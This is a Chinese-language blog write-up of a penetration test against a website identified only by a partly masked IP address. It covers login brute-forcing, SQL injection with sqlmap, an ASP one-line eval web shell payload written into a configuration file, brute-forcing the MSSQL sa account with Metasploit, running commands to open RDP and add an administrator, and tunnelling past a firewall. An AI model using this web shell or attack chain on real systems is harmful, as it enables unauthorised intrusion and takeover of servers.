zoukankan      html  css  js  c++  java
  • 一次完整的渗透测试

    目标网站:39.xxx.xxx.xxx

     一阶段前台测试:

    1、前台存在登陆入口且无验证码(肯定要暴力破解啊)

    2、前台url参数处加敏感字符数据库报错存在sql注入

    3、前台登陆处输入危险字符,数据库报错存在post注入

    测试结果如下:

    暴力破解获得

    用户名:admin

    密码:123456

    利用sqlmap跑注入并没有跑出任何数据

    只能登陆看一下了

    二、登陆前台测试

    利用前台的会员登陆发现有使用第三方编辑器(并没有找到可利用漏洞)

    存在xss漏洞

    存在sql注入漏洞

     

     在登陆的状态下继续进行sql注入(burp  copyto file )发现跑出来一个表

     

     只跑出了当前账户和一个同级账户

    到这里看了眼后台还是一脸懵逼

     

    三、黑盒已经不好搞了,下载同类CMS

    搭建环境撸一把

    把相同源码cms数据库表名

    将对应表明加入sqlmap库中

    路径:sqlmap/txt/common-tables.txt

    (表名一定要放前边放最后要跑一年的)

    继续sqlmap跑、

     

     成功进入后台

    四、getshell


    进入后台之后发现编辑器两个

    文件上传白名单,试了很久,基本行不通了

    后台依旧存在XSS漏洞(这里的XSS可以利用拿到后台管理员cookie)

     搞了半天发现又遇到瓶颈了

    再去撸一把源码

    发现当更新缓存的时候,根目录下多了一个HTML文件修改html文件后发现报错

    在后台参数配置处修改配置发现报错

    审查代码发现代码漏洞

    anxi

    nMall.basic.asp是一个ASP文件考虑写入一句话

    本地构造payload(这里随便改点东西网站就瘫了如果在目标网站那肯定凉凉了)

    "%> <%eval request ("pass")%> <%'
    这里原有的邮箱 只能闭合 不能删掉,不然数据库会错误

     

    菜刀连接、

     

     五、提权、

     nmap扫描发现目标开放1433端口

    msf对1433端口sa进行爆破

     

    爆破成功

    mssql账号和密码为:sa /123456

    使用msf命令执行模块,执行最终的dos命令

    use auxiliary/admin/mssql/mssql_exec

    开启3389端口并且建立管理用户以后

    利用HTTP隧道进行连接3389(绕过防火墙)

    详细方法见下面的网址

    https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html

    另外可以

    通过MSFVenom生成exe后门木马拿shell()

  • 相关阅读:
    python格式化输出之format用法
    Mybatis插入数据返回主键
    DBC 和 Mybatis连接mysql数据库的时候,设置字符集编码
    工具列表
    Idea的Git如何回退到上一个版本
    mybatis-plus id主键生成的坑
    JAVA 线上故障排查完整套路,从 CPU、磁盘、内存、网络、GC 一条龙!
    DDD-快速hold住业务的利器
    深入理解ThreadLocal的原理和内存泄漏问题
    VUE开发--环境配置
  • 原文地址:https://www.cnblogs.com/xiaoyunxiaogang/p/10941297.html
Copyright © 2011-2022 走看看